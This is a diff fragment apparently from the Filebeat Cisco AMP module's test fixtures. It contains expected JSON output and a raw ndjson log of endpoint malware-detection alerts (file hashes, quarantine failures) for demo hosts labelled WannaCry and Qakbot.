"cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 732000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419247189909832000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76965, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 81932, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870786", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "", + "file.path": "", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 84487, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 479000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 85686, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88168, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T15:18:48.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419239046651838535", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239050946806000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90868, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814971", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 91988, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93180, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782278", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 773000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 94365, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782277", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 648000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 95638, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782276", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 570000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 96911, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782275", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 414000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 98184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782274", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 368000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 99457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782273", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 134000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 100730, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782272", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 102003, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782271", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 87000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 103275, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:06.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229335730782270", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 56000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229335730782000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 104547, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log new file mode 100644 index 000000000000..6ccff00d38b1 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log @@ -0,0 +1,53 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 